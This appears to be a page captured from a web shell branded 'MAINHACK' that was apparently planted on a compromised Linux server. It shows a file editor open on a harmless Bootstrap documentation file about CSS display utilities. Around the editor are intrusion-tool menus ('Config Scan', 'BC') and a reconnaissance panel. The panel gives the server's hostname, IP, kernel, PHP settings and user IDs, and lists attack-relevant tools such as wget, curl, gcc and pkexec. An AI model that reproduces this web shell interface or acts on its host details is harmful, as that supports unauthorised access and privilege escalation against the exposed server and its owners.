[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: display.md
--- layout: docs title: Display property description: Quickly and responsively toggle the display value of components and more with our display utilities. Includes support for some of the more common values, as well as some extras for controlling display when printing. group: utilities toc: true --- ## Common `display` values The [`display` property](https://developer.mozilla.org/en-US/docs/Web/CSS/display) accepts a handful of values and we support many of them with utility classes. We purposefully don't provide every value as a utility, so here's what we support: - `.d-none` - `.d-inline` - `.d-inline-block` - `.d-block` - `.d-table` - `.d-table-cell` - `.d-flex` - `.d-inline-flex` Put them to use by applying any of the classes to an element of your choice. For example, here's how you could use the inline, block, or inline-block utilities (the same applies to the other classes). {% example html %} <div class="d-inline bg-success">d-inline</div> <div class="d-inline bg-success">d-inline</div> {% endexample %} {% example html %} <span class="d-block bg-primary">d-block</span> {% endexample %} {% example html %} <div class="d-inline-block bg-warning">d-inline-block</div> <div class="d-inline-block bg-warning">d-inline-block</div> {% endexample %} Responsive variations also exist for every single utility mentioned above. {% for bp in site.data.breakpoints %} - `.d{{ bp.abbr }}-none` - `.d{{ bp.abbr }}-inline` - `.d{{ bp.abbr }}-inline-block` - `.d{{ bp.abbr }}-block` - `.d{{ bp.abbr }}-table` - `.d{{ bp.abbr }}-table-cell` - `.d{{ bp.abbr }}-flex` - `.d{{ bp.abbr }}-inline-flex`{% endfor %} ## Hiding Elements For faster mobile-friendly development, use responsive display classes for showing and hiding elements by device. Avoid creating entirely different versions of the same site, instead hide element responsively for each screen size. To hide elements simply use the `.d-none` class or one of the `.d-{sm,md,lg,xl}-none` classes for any responsive screen variation. To show an element only on a given interval of screen sizes you can combine one `.d-*-none` class with a `.d-*-*` class, for example `.d-none.d-md-block.d-xl-none` will hide the element for all screen sizes except on medium and large devices. | Screen Size | Class | | --- | --- | | Hidden on all | `d-none` | | Hidden only on xs | `d-none d-sm-block` | | Hidden only on sm | `d-sm-none d-md-block` | | Hidden only on md | `d-md-none d-lg-block` | | Hidden only on lg | `d-lg-none d-xl-block` | | Hidden only on xl | `d-xl-none` | | Visible on all | `d-block` | | Visible only on xs | `d-block d-sm-none` | | Visible only on sm | `d-none d-sm-block d-md-none` | | Visible only on md | `d-none d-md-block d-lg-none` | | Visible only on lg | `d-none d-lg-block d-xl-none` | | Visible only on xl | `d-none d-xl-block` | ## Display in print Change the `display` value of elements when printing with our print display utilities. | Class | Print style | | --- | --- | | `.d-print-block` | Applies `display: block` to the element when printing | | `.d-print-inline` | Applies `display: inline` to the element when printing | | `.d-print-inline-block` | Applies `display: inline-block` to the element when printing | | `.d-print-none` | Applies `display: none` to the element when printing |
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.24 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002